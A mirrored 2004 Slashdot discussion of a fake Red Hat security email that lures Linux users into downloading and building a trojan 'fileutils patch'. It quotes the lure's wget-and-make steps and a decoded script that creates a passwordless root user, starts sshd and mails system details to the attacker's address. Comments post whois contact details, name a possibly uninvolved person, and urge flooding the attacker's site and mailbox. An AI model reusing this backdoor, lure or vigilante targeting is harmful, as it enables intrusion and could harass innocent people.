Slashdot Mirror
Beware 'Fedora-Redhat' Fake Security Alert
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
Original issue date: October 20, 2004
z or directly here. ./inst
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.g
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
*
Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Adopting dumb users had to bring the ones exploiting the stpidity with them. Even tho running as a non-admin should help againts these things, there is no cure against security holes between the chair and the keyboard.
The system had the verbosity of HTML combined with all the readability of compiled assembly viewed as bitmap images
It's fishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.
I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.
Stay tuned.
Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.
[Querying whois.internic.net]
[Redirected to whois.melbourneit.com]
[Querying whois.melbourneit.com]
[whois.melbourneit.com]
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES
Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............
Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
Oh, no! You have walked into the slavering fangs of a lurking grue!
Why not just use the real link and slashdot their site into oblivion!
Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.
However, what good is that against Joe User who falls for the bait and things the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.
It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of windows users, but as the audience of Linux is mostly tech-savy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?
Those who can make you believe absurdities can make you commit atrocities. - Voltaire
Running untrusted code can result in system compromise.
Everyone checks the gpg signatures right?
Now if each time when someone tries this sort of thing gets their server posted here on slashdot, we could actually do something good with the slashdot effect and put their server up in smoke before much damage is done. :-D
home
OK, we all know no Linux Guru will ever fall for this kind of stupid trick.
But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it`s one of the first time we see this. Lots of distros, lots of sources, lots of patches, major confusion.
Question (as I don`t use Linux yet) : Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.
Eureka Science News - automatically updated
or better yet, it Microsoft paid the Yankee group to do it for them, and then do an "independent study" on it.
Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).
________
Entranced by anime since late summer 2001 and loving it ^_^
I'm sure glad I'm using windows!
Either it is malicious or not.
Don't they know ?
If it does; explain what it does and how to mitigate the damage.
If it does not; let people know so emotional energy can be use elsewhere.
What the definition of 'malicious code' anyway ?
Presumably any code you don't want running is malicious.
Creating a temp file would be a malicious use of disk space, etc.
"Anybody running RedHat and Fedora are strongly adviced to apply this patch!"
Why can't scammers ever spell? Someone send them a copy of Strong Bad's "Rhythm 'n' Grammar", quick!
More like... nerdular nerdence!
Identifying the system. This may take up to 2 minutes. Please wait... /etc/ssh/ssh_host_key /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_dsa_key
adduser: No more than two names.
passwd: Unknown user bash
Could not load host key:
Could not load host key:
Could not load host key:
Disabling protocol version 1. Could not load host key.
Disabling protocol version 2. Could not load host key.
sshd: no hostkeys available -- exiting.
System looks OK. Proceeding to next step.
Patching "ls": ###########
Patching "mkdir": ##########
System updated and secured successfully. You may erase these files.
Dammit why does Linux have to be so complicated, I mean damn you have to compile your own viruses and everything!!!!
Debian has been weeding out incompetent users with its "impossible to use" installer for years.
It keeps the "Mandrake Crew" off of the debian-users lists.
If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.
How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.
(Disclosure: I wrote the plugin. :) )
But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!
It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.
Ok, that was a horrible misspelling of malicious :|
However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com
Anybody feel like dropping them a line to tell them they're hosting trojaners?
All's true that is mistrusted
Shut it down! Someone paid you to host this, pass that information along to the authorities.
I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
View inst.c
From shc's manpage:
Definitly doing something then, at least viewing the parent post.
Here is what it does.
Dogg
The source code for inst.c seems to be very similar to the "Klik client" code from http://klik.berlios.de/client/klik-0.1.3.c
Everything but the comments at the top of the page, and the shellcode, is pretty-much identical.
Klik looks to be a "KDE-based Live Installer for Knoppix".
Still looking....
Red.
Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.
0 1 - just my two bits
The funniest part is that the code (a shell script compiled into C code, then into a binary, to obfuscate its purpose) failed miserably on my test systems, both Knoppix AND Fedora Core 2. It spat out a bunch of errors which completely revealed the fact that it was trying to add a user, start sshd, etc. C'mon, if you're gonna terrorize the Linux world, at least do it right!
Going to the site, The use of Redhat logo and Redhat name itself is in clear violation of the trademark guidelines. I am guessing it will not be too long before this site and domain is taken down.
My question is: can these a**holes get away with using the 'fedora' name instead?
ps. I am not affilated with RH in anyway.
Copyright © 2004 All rights reserved. Redhat is a registered trademark of Redhat (only). No soup for you.
The script is encoded into the text variable in the source. The key part of the script is this:
/tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null /tmp/mama
echo "Inca un root frate belea: " >>
adduser -g 0 -u 0 -o bash >>
passwd -d bash >>
ifconfig >>
uname -a >>
uptime >>
sshd >>
echo "user bash stii tu" >>
cat
rm -rf
(I'd post the whole script but the lameness filter won't let me)
Create a user named bash, no password
grab the ip and uptime, start ssh
mail the results
- MbM
Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.
>md5sum fileutils-1.0.6.patch.tar.gz
68349c219d941209af8f7c968b89d622 *fileutils-1.0.6.patch.tar.gz
So you can be sure you're getting the real fake patch.
The shareholder is always right.
The question begging to be asked is why is this site still alive?
/. effect!
heh, maybe it won't be for long with the
The race isn't always to the swift... but that's the way to bet!
Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.
Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.
Here's what I do: Bitty Browser & Andromeda
Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.
UNIX? They're not even circumcised! Savages!
But slashdotting the misused domain will let the company hosting the fraudulent crap know that they should vet their users a bit more carefully, and let them know that they're hosting a *BIG* problem and may need to review their overal customer contracts to prevent this in the future. It also helps give the company incentive to prosecute, or at least sue, the jerk who set them up for this.
If the Antivirus companies were responsible, they'd have done a better job.
If Microsoft was responsible, they wouldn't have included any source code.
If SCO was responsible, they'd have included sourcecode and then sued you for running it
All things taken into consideration, I'm with 'other' on this one
Ripping an new rectum in the fabric of spacetime.
(Mind you, I'm no better. First time I got a computer virus, when I was running MSDOS, my first reaction was to run a binary diff against a clean version of the file, and disassemble the result to see what it did. Do you know if there's a cure for this?)
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.
Malike Bamiyi wanted my assistance.
We know the email address that the trojan sends it's feedback to. Rather than attempting to slashdot the site, why don't we just flood the email box. It'll eat bandwidth, dilute any useful data the SOB who set this up will get, and maybe stop future dipshit admins from getting whacked. So... anybody want to work out the format of a message telling whatever lameass came up with this scheme that microsoft.com just got rooted? :-)
// Dumps core here
To : abuse@everyone.net,
abuse@above.net
Subject : malware using your netblock to propagate
http://it.slashdot.org/article.pl?sid =04/10/24/2352234&tid=172&tid=110&tid=218&tid=106
The story reports on a linux trojan that, after installing, emails a
report back to root@addlebrain.com. The MX record for addlebrain.com
points to sitemail.everyone.net. It would reduce the effect of this if
you could shut down that email account.
Better yet, you should gather the list of infected IPs and then inform
the owners.
Damian Menscher
--
-=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
-=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
-=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
-=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
-=#| The above opinions are not necessarily those of my employers. |#=-
Red Hat should simply rename the file on their site, change the links to it, and then replace it with a "THIS IS FRAUD" PNG.
TO BUY A NEW CAR WOULD MAKE YOU SEXUALLY ATTRACTIVE.
Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.
.mil and .gov sites. :o)
If you do, make sure the IP addresses are of
I knew, my habit of not updating my systems would help me someday.
Python script to convert photos into "artsy" portraits: http://p2pbridge.sf.net/pyPortrait/
without bothering to RTFA, and mistakenly think that it's a legit patch,
Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.
I confirm, it's Romanian, I translated in other post, nothing important, the writer is an idiot.
"It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
here is a slashdot user who has translated it.
I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
It appears the human body maintains a temperature of approximately 98.6'F... lemmie shove a thermometer up my @ss, and I'll report back my findings here.
I looked at the whois... fedora-redhat.com reported:
Raymond Jackson
224 Cedar Avenue
New York, NY 95301.
209 899-4533 However, 95301 is an Atwater, CA zip code.
So, I looked up Raymond Jackson in Atwater. What did I find?
Raymond Jackson
224 Cedar Avenue
Atwater, CA 95301
209 358 8510.
Looks like he did a crappy job of disguising his identity. Go get him!!!
host fedora-redhat.com
fedora-redhat.com has address 66.218.79.149
fedora-redhat.com has address 66.218.79.155
fedora-redhat.com has address 66.218.79.147
fedora-redhat.com has address 66.218.79.148
whois 66.218.79.149
OrgName: Yahoo!
OrgID: YAOO
Address: 701 First Avenue
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US
NetRange: 66.218.64.0 - 66.218.95.255
CIDR: 66.218.64.0/19
Trying to ddos yahoo wont get you very far : )
Lawyers, MBA's, RIAA? A jedi fears not these things!
Someone on the full-disclosure has posted a good analysis of what this is. Have a look at this thread.
Not if you run your own mail server(s).
As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?
(Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never done it before.)
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
Try:
These are more than good enough.
I prefer the "u" in honour as it seems to be missing these days.
I can just imagine...
./configure
"Attached is a sexy picture of Anna Kournikova.
To view the picture, simply:
1) save the attachment
2) su -
3) tar -xjf anna.tar.gz
4)
5) make
6) make install
7) anna"
Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary.
This is an unfortunate reality today. Back in my day, the only way to be a real Linux guru was to compile and build your system from scratch using a dev box.
Nowadays, any average person can easily install Linux and instantly become "31337". Today's typical Linux user has no idea what half the files on his system do, or where they came from. Unforunately, the majority of you with moderator points fall into this category so my post is doomed!
I would advise those who are new to Linux to visit the Linux From Scratch website and set aside a weekend of learning. There is no better method for gaining useful knowledge regarding the reduction of hard drive clutter and increasiong optimization, and security.
This is an honor virus. Please forward to all your friends, then format your hard drive(s). Thank you.
I feel fantastic, and I'm still alive.
We're supposed to believe this?
This is a buggy honor virus. Please format your hard drive(s) and then pass it to all your friends.
Thank you.
Free Software: Like love, it grows best when given away.
Been there, done that:
<root@addlebrain.com>: host sitemail.everyone.net[216.200.145.51] said: 554
Recipient Rejected: Not accepting mail for this account : Account
terminated due to violation of user agreement
...the system works!
Agreed, but it needs be very very careful as to any assumptions as to exactly which system it was that worked.
The first order of business is to somehow, anyhow, stem the tide.
The second is to be very wary of jumping to any conclusions. If I'm going to do something bad that requires a name and address on it, I will use your name and address not mine.
Third, it is probably better if the reactive responses are not exactly predictable. If your enemy has extremely predictable responses, you can defeat his superor forces with inferior forces.
Judging from this and the responses to this, I'd say that Open Source is in very good shape to take care of itself. Even better than a coordinated defense is being able to defend regardless of coordination or the lack thereof. Counting vulnerabilities is an extremely bad metric, particularly considering that Red Hat, etc knows that if you actually want people to patch their systems, you never under any circumstances downplay the potential severity.